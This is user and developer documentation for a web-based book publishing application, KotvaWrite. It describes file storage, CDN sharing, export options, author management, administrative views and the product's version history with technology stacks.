It is possible to save files to a project that may not even have any specific use and which can't be used as straightforwardly as catalog images. Files of any kind can be dragged and dropped onto the "Files" table, which saves them as project files. These files are included in backups when the project is exported, and they are recreated when the project is imported in the project listing view. Next to each file is a Download button, which allows the file to be downloaded for use if required. At some point, a file preview function will also be available, which could e.g. be used to see what is in a zip package. For some file types, you can already view their contents in the File preview panel (e.g. zip files, image files and text files).

CDN files

If, in addition to storing files, you want to be able to share them publicly with others, you can transfer files to an (existing) CDN service, which in this case is Bunny's CDN Storage. The only effort required is to create a Storage Zone in Bunny's settings and an apikey for it (the key is entered in the external services section of the user settings of the publishing application). There are two types of these apikeys, one read-only and one read-write. The latter is needed for file transfer using a separately installed FTP application.

In order for files to be visible in the CDN Files table, files accessible via CDN must be located in a directory starting with "project_" followed by the id number of the project in question. The rest of the directory name can be anything. In the CDN Files table, listed on the same line as the files, are urls, which are the publicly accessible web addresses. You can use them however you like, but one should be aware that these are files distributed via the CDN service, so there is a charge for downloading them via the web and hence via Bunny.
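The directory naming rule can be sketched as a small filter. This is an illustration only: the function names are hypothetical, and it is an assumption here that the "project_" directory sits at the top level of the storage path.

```python
import re
from typing import Optional

# The directory name must start with "project_" followed by the numeric
# project id; whatever comes after the digits is free-form.
PROJECT_DIR = re.compile(r"^project_(\d+)")


def project_id_from_path(path: str) -> Optional[int]:
    """Return the project id encoded in the first directory of a storage path."""
    first_dir = path.strip("/").split("/", 1)[0]
    match = PROJECT_DIR.match(first_dir)
    return int(match.group(1)) if match else None


def files_for_project(paths, project_id):
    """Keep only files that live inside a directory belonging to the project."""
    return [
        path
        for path in paths
        if "/" in path.strip("/") and project_id_from_path(path) == project_id
    ]
```

With this rule, "project_12_photos/cover.jpg" belongs to project 12, while "project_123/a.png" does not, because the whole run of digits is read as the id.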

This same CDN file storage can also be used to play audio and video files, e.g. by providing a public address referring to them in the text editing view (under the Embeddables tab, choose Attach embeddable and then "Video file" or "Audio file" in the modal window that opens). No particular directory name is required for this, but you should refer to the Bunny instructions on how to form public addresses.

Importing a project using SFTP (SSH File Transfer Protocol)

In the project listing view, there is a limit of 500 MB for zip files containing a backup of a project. Larger ones have to be transferred using SFTP, and the import has to be continued in a different way (the functionality for that is available, but there is currently no button for it in the user interface).

In the user settings, there is a Tighter UI option, which slightly reduces the size of almost all fonts in the user interface of a regular user and reduces the space taken up by some visual elements. This is useful e.g. on laptops that don't have a very large screen. On the iPad Pro and many other tablets, the user interface may feel appropriate whether the setting is enabled or not.

The first two of these are enabled from the user settings by enabling the experimental functions (manifested as additional buttons in the project managing view), while the third is likely to be used more heavily to the extent that it is readily available.

Printable version (for solutions having "plain structure" as content list type)

Any solution that has been prepared for online reading can be made into a PDF version with a single click of the relevant button. The resulting PDF contains a separate cover page and all collections of writings in their own parts with all printable contents. Page numbers in the footers with section information are included, as are the before/after special pages. Images are positioned as well as on the web, font choices are exactly right and the results are otherwise generally fine. Currently the content list type "plain structure" is preferred, as others such as "presentation page" and blog-like would give unexpected results.

This has been done in a completely different way to the previous attempt, where a TeX file was first generated, containing both styling and content, and then a PDF file was generated from it. Instead, the external service generates the PDF file from the same ingredients that browsers use to generate web pages, i.e. HTML code, CSS styling and JavaScript code. An important addition is the use of CSS3 Paged Media:

"CSS module specifies how pages are generated and laid out to hold fragmented content in a paged presentation. It adds functionality for controlling page margins, page size and orientation, and headers and footers, and extends generated content to enable page numbering and running headers / footers." (CSS Paged Media Module Level 3. W3C Working Draft, 18 October 2018.)

Creating a PDF version works well when targeting the A4 paper size, but for other sizes the implementation is still under consideration.

Many browsers have not implemented this standard, which is why printing directly from the browser does not give optimal results when the purpose is to include page numbering etc. For example, the Firefox browser does not make much use of CSS Paged Media (as of the last test), but Edge and Chrome do. However, a problem with using them is that they either include extra information such as the date in the header and footer, or the header and footer have to be completely empty (the print settings only offer an either/or option).

In fact, as the external service intended for generating PDF files charges a fee, the process has been shortened by one step: the user is served a downloadable HTML file that contains all of the "ingredients" mentioned above together with the content. The user can then print it from a browser, provided the browser has sufficient support for CSS3 Paged Media.
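What such a self-contained printable HTML file might look like can be sketched as follows. This is an assumption-laden illustration, not the application's actual output: the function name `build_printable_html`, the margins and the markup structure are hypothetical. The `@page` rule, the `@bottom-center` margin box and `counter(page)` come from CSS Paged Media, and browser support for them varies.

```python
from html import escape

# CSS Paged Media rules: A4 pages with the page number in the bottom margin.
PAGED_CSS = """
@page {
  size: A4;
  margin: 25mm 20mm;
  @bottom-center { content: counter(page); }
}
@page :first {
  @bottom-center { content: none; }  /* no page number on the cover page */
}
section { break-before: page; }      /* each part starts on a new page */
"""


def build_printable_html(title, sections):
    """Return one HTML document; `sections` is a list of (heading, paragraphs)."""
    parts = [
        "<!DOCTYPE html>",
        '<html lang="en"><head><meta charset="utf-8">',
        f"<title>{escape(title)}</title>",
        f"<style>{PAGED_CSS}</style></head><body>",
        f"<header><h1>{escape(title)}</h1></header>",
    ]
    for heading, paragraphs in sections:
        parts.append(f"<section><h2>{escape(heading)}</h2>")
        parts.extend(f"<p>{escape(paragraph)}</p>" for paragraph in paragraphs)
        parts.append("</section>")
    parts.append("</body></html>")
    return "\n".join(parts)
```

The returned string can be written to a single .html file and opened in a browser for printing; styles are inlined so that the file does not depend on any server.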

Publishing a solution elsewhere (server-independent HTML version)

It is possible to export a solution contained in the project into a zip file, so that the contents of the package can be copied via FTP or SCP to a directory on a server of one's choice and made publicly viewable in a browser. A solution exported this way looks the same, but its contents are completely "static" (not generated separately at every page load). The images in the work can be distributed via a CDN service, retrieved by the browser directly from that other server, or embedded in the relevant web pages as encoded data.
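Embedding an image in a web page as encoded data usually means a base64 data URI. The following is a minimal sketch of that technique; the function names are hypothetical and whether the application uses exactly this form is an assumption.

```python
import base64
import mimetypes
from html import escape


def to_data_uri(filename: str, data: bytes) -> str:
    """Encode file contents as a data URI, guessing the MIME type from the name."""
    mime, _ = mimetypes.guess_type(filename)
    if mime is None:
        mime = "application/octet-stream"  # fallback for unknown extensions
    encoded = base64.b64encode(data).decode("ascii")
    return f"data:{mime};base64,{encoded}"


def img_tag(filename: str, data: bytes, alt: str = "") -> str:
    """Build an <img> element that carries the image inside the page itself."""
    return f'<img src="{to_data_uri(filename, data)}" alt="{escape(alt)}">'
```

The trade-off is that base64 encoding makes the data roughly a third larger, but the page no longer needs a separate request for each image.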

If necessary, the project list view has a function to generate an index list of published works, but if the user wants to edit the index list in an HTML editor, some know-how about building websites might be required. In practice, the generated index.html file contains all images as encoded data, with the CSS files and JavaScript libraries included.

Exporting a writing together with its images

When preparing a writing and its images for publishing elsewhere, such as in a discussion forum or a Facebook group, the writing and its images can be exported to a zip package containing three different versions of the writing. One of them is an unstyled HTML version with the tags p, h1 and h2 (lists are converted to text paragraphs). The other two are plaintext, with the difference that one does not have a blank line after the text paragraphs, which can streamline workflows, e.g. when copying and pasting. The image files of pictureshows are named in a way that makes it easier to identify which ones belong to the same pictureshow. The feature is available in the "text editing" view by selecting "Export for use elsewhere" from the editor's menu.
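The three exported versions can be sketched as below. The block structure used as input, the function names and the file names inside the zip package are all hypothetical; only the rules themselves (tags p, h1 and h2, lists turned into paragraphs, plaintext with and without blank lines) come from the description above.

```python
import io
import zipfile
from html import escape


def flatten(blocks):
    """Turn list blocks into plain paragraphs, one per list item."""
    for kind, content in blocks:
        if kind == "list":
            for item in content:
                yield "p", item
        else:
            yield kind, content  # kind is "h1", "h2" or "p"


def export_versions(blocks):
    """Return the three text versions keyed by (hypothetical) file name."""
    flat = list(flatten(blocks))
    texts = [text for _, text in flat]
    return {
        "writing.html": "\n".join(f"<{k}>{escape(t)}</{k}>" for k, t in flat),
        "writing_spaced.txt": "\n\n".join(texts) + "\n",  # blank line between paragraphs
        "writing_compact.txt": "\n".join(texts) + "\n",   # no blank lines
    }


def export_zip(blocks, images):
    """Pack the text versions and the images (name -> bytes) into zip bytes."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w", zipfile.ZIP_DEFLATED) as archive:
        for name, text in export_versions(blocks).items():
            archive.writestr(name, text)
        for name, data in images.items():
            archive.writestr(f"images/{name}", data)
    return buffer.getvalue()
```

The compact plaintext version is the one that pastes cleanly into forums that add their own paragraph spacing.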

The desktop publishing software InDesign has for a long time allowed all its functionality to be controlled with ExtendScript, so after a while of exploring InDesign's API, it became clear that it can indeed be used to do what had already been envisioned and what could not be done flexibly enough with the LaTeX typesetting system. A backup of a project (zip package) contains all the essentials for creating an InDesign version, and in practice all that is needed is to run a single script in InDesign that first asks which directory the decompressed files are in and then generates the same work in a different form based on the available writings, style definitions etc.

It has long been possible to give editing rights to users of an instance of the publishing application on a project-by-project basis, and each writing has an Authors field where one can tell who the authors are. Sharing a session code after logging in is also a way to give access rights, but then one would be giving access to everything that can be done with that user account. The internal functionality of the publishing application currently includes the possibility of realtime device-to-device communication between users of an instance, which, if developed further, could make collaboration between users more sophisticated than just giving editing rights.

These are somewhat experimental and lack a well-defined purpose, so everything related to multiple users (authors and co-editors) is only available after enabling the experimental features in the user settings.

A user can add authors both to their own writings and to writings belonging to projects to which they have received editing rights. The authors are used in contexts where the authors' details etc. are displayed. E.g. in the fine-tuning view, you can add the contributors placeholder to the writing, which will be used to generate author information in the final version of the writing. The function for this can be found in the Tools menu ("Functional embed: contributors"). The placeholder can be converted to plain text by Alt-clicking.

These "authors" can be created in the Authors tab of the user preferences, and they can be transferred from one user to another if necessary. They can be used to communicate to readers the role played by each author in the creation of the writing. Later on, images can also be used, but at this stage these authors are text only. Users with editing rights will not be able to remove authors other than their own.

These authors are loosely decoupled from writings in such a way that if a project is first exported and then deleted from among other projects, the relationship between them is broken. The backup will only include a hint of the author's name, but on the other hand there will be a semi-automatic function in the Usabilities view to reconnect authors.

This view, which requires a separate login account, is not intended to be used very often. Usually it only needs to be accessed briefly at the very beginning, when becoming a customer of the publishing application, so that the CDN address can be set. Until it is set, the footer of every public page contains a message about the missing CDN address.

It provides, among other things, the ability to create new users and to edit user-specific constraints. Some areas of the managing view contain only information, e.g. "how much outbound transfer bandwidth has been used in the current billing cycle".

A user's project can be transferred from one user to another in this interface, but only if the catalogs of that project are not used by any other project. If this condition is not met, the project transfer will not even be started. The transfer requires as parameters the project id and the username of the user to whom the project is to be transferred. From a database point of view, such a transfer is a quick operation: because the database is relational, changes are not needed in many places if the project has no image catalogs at all, and even if it has some, the transfer is still done quickly. If a project being transferred to another user has adequatesets associated with it, these associations are removed, as adequatesets are not intended to be transferable from one user to another, at least for the time being.
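The transfer rule can be sketched with plain dictionaries standing in for database tables. Everything named here (`TransferRefused`, `shared_catalogs`, `transfer_project` and the shape of the data) is hypothetical and only illustrates the order of the checks, not the actual database schema.

```python
class TransferRefused(Exception):
    """Raised when a project shares catalogs with other projects."""


def shared_catalogs(project_id, catalog_usage):
    """Return ids of catalogs used by this project and at least one other.

    `catalog_usage` maps a catalog id to the set of project ids using it.
    """
    return sorted(
        catalog_id
        for catalog_id, projects in catalog_usage.items()
        if project_id in projects and len(projects) > 1
    )


def transfer_project(project_id, new_owner, owners, catalog_usage, adequateset_links):
    """Move a project to `new_owner`, or refuse before changing anything."""
    blocked = shared_catalogs(project_id, catalog_usage)
    if blocked:
        raise TransferRefused(f"catalogs shared with other projects: {blocked}")
    owners[project_id] = new_owner
    # Adequateset associations are dropped rather than transferred.
    adequateset_links.pop(project_id, None)
```

Checking the condition before touching any data mirrors the statement that a transfer which cannot succeed is not even started.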

On rare occasions, one might choose from the normal user accounts the one that will become the main user, i.e. the one whose public solutions will be listed when going to the domain's index page. Otherwise, a user listing would be displayed, from which one could select a user to see that user's listing of published solutions.

If necessary (highly unlikely), there is a simple button that can be used to clear the contents of the long-lived caches that build up in the main memory of the servers in use. Such caches include a partial copy of the database contents with relations, as it is much faster to retrieve information from them than from the database, which is located on a slower SSD.

This user-specific view is very prototypical, and not just in its naming. It is intended to

a) Make one aware of possible problems (Problems) that may occur, e.g. when elements are transferred from project to project in a slightly incomplete way and something is forgotten. Where possible, "one-click" fixes are available.

b) Confirm something that needs a little more clarification (Clarifications), such as the lengths (in terms of time) of solutions' caches, and images that are in some image catalogs but aren't used anywhere. There is also a somewhat similar option in the "browse image catalogs" view, which filters image lists to show only those images that are not yet used anywhere. When one has a lot of pictures, things like that can get forgotten.

c) Remind one, on request, (Reminders) of something that might need to be or should be checked periodically, e.g. by listing writings that are marked as "preparing". It is possible that this functionality could end up somewhere else with a different implementation.

KotvaWrite Stories and KotvaWrite Explanations (2017)

The main purpose of KotvaWrite has been to make it possible to carry out a large number of layout experiments and adjustments to literary works in a short enough time, so that the time spent waiting does not feel long and meaningful results can be reached effortlessly. However, the typesetting system (XeTeX) does not keep up with such a fast pace, and this significantly guided the product development. It was therefore decided to split the product into two different product lines, one (KotvaWrite Stories) producing HTML-based works with a wider range of style options and the other (KotvaWrite Explanations) producing both PDF- and HTML-based works, but with slightly more limited layout and adjustment options.

JDK 1.8, JPA, REST, EclipseLink, Eclipse, Visual Paradigm for UML, Foundation, Backgrid, Backbone, Underscore.js, SASS, jQuery, HTML5, CSS 2.1/3, MySQL, MariaDB, MongoDB, JavaScript, NoSQL, JNDI, Tomcat 8, Digital Ocean, Putty, Linux command line tools, TeX, LaTeX, XeLaTeX, Loadster, NeoLoad, New Relic, Datadog, Nginx, HAProxy, Parse API, UML, Git, JUnit, Photoshop, MySQL Workbench

Process for generating preview images for a single writing

Java-based code generates a .tex file on the server side and then calls xelatex.exe or pdflatex.exe to produce a .pdf file whose structure and styling are mostly determined by the settings made in the web interface. The XeTeX typesetting system makes its best effort to compile the final result in one run, but sometimes it needs to be instructed to make another set of calculations after the first run. Apache PDFBox is used to generate thumbnails of individual pages for viewing in the web interface.
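The need for a second run can be detected from the compiler's log file. The original code is Java-based; the following Python sketch only illustrates the control flow, and the names `needs_rerun` and `compile_tex` as well as the limit of three runs are assumptions. LaTeX itself writes messages such as "Rerun to get cross-references right." to the log when another pass is required.

```python
import subprocess
from pathlib import Path

# Phrases that LaTeX and common packages write to the log when the
# layout data changed during the run and another pass is needed.
RERUN_MARKERS = ("Rerun to get", "Rerun LaTeX")


def needs_rerun(log_text: str) -> bool:
    """Return True if the log asks for another compilation pass."""
    return any(marker in log_text for marker in RERUN_MARKERS)


def compile_tex(tex_path, engine="xelatex", max_runs=3):
    """Run the engine until the log no longer asks for a rerun.

    Returns the number of runs performed. Requires the engine to be
    installed and available on the PATH.
    """
    tex_path = Path(tex_path)
    for run in range(1, max_runs + 1):
        subprocess.run(
            [engine, "-interaction=nonstopmode", "-halt-on-error", tex_path.name],
            cwd=tex_path.parent,
            check=True,
            capture_output=True,
        )
        log_text = tex_path.with_suffix(".log").read_text(errors="replace")
        if not needs_rerun(log_text):
            return run
    return max_runs
```

Capping the number of runs avoids an endless loop in the rare case where the layout never stabilises.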

KotvaWrite 2

It is still a web application for producing book-length, online readable works. The application consists of four parts that can be used for these:

  • Importing of material to be used in writings from multitude of sources.
  • Arranging material and writings.
  • Text writing and editing.
  • Compiling writings into a literary work that gets generated on the basis of parameters that affect layout, styling and presentation.

The most significant change compared to the previous version is at the interface level, which has been completely redesigned. Responsive design has been used to substantially improve the user experience. Some additional features have been added since then (including an automatically generated PDF file and fine-tuning of the print version of the HTML version).

Java EE 6, JPA, REST, EclipseLink, Eclipse, Oxygen XML, Visual Paradigm for UML, Foundation, Backgrid, Backbone, SASS, jQuery, HTML5, CSS 2.1, MySQL, OrientDB, XML, iText, JavaScript, NoSQL, JNDI, Tomcat 7, AppFog, UML, Mylyn, Git, JUnit, Photoshop, MySQL Workbench

KotvaWrite v1.0

KotvaWrite is a useful web application for creating and editing text-based material that can take a book-like structure (in essence, multiple writings placed in collections that can be combined into a larger whole), which can be exported as a PDF file or made readable by others in HTML format. Text can be accompanied by images, illustrations, drawings and certain other types of "attachments" often seen in blog posts.

Java EE 6, JPA, REST, EclipseLink, Eclipse, Oxygen XML, Visual Paradigm for UML, Dojo, jQuery, HTML5, CSS 2.1, MySQL, OrientDB, XML, JavaScript, NoSQL, JNDI, Tomcat 7, AppFog, UML, Mylyn, Git, JUnit, Photoshop, MySQL Workbench

Ancoaarmade (predecessor of KotvaWrite)

The idea was to develop a web application that would serve its users in needs such as writing down observations, self-learning, organising and publishing information, producing information, organising thoughts and remembering things. The final product will be a set of writings, which can be made public if desired, and which may consist of various collected or generated materials such as video clips, diagrams, pictures, drawings and other illustrative material. Material can be brought in from external data sources or from a mobile phone.

Java EE 6, JAXB, JPA, EclipseLink, Eclipse, Oxygen XML, Visual Paradigm for UML, Dojo, jQuery, HTML5, CSS 2.1, MySQL, OrientDB, XML, JavaScript, NoSQL, JNDI, Tomcat 7, CloudBees, Amazon AWS, Jasmine, DOH Robot, UML, Microsoft Project, JIRA, Mylyn, Git, PureTest, CodePro Analytix, PMD, JUnit, Photoshop, Fireworks, SHA1, PayPal API, Chrome extension, Firefox Add-on, Mockingbird, Adobe AIR, MySQL Workbench, Jenkins, continuous integration, REST, async servlets + filters, refactoring, design patterns, naming conventions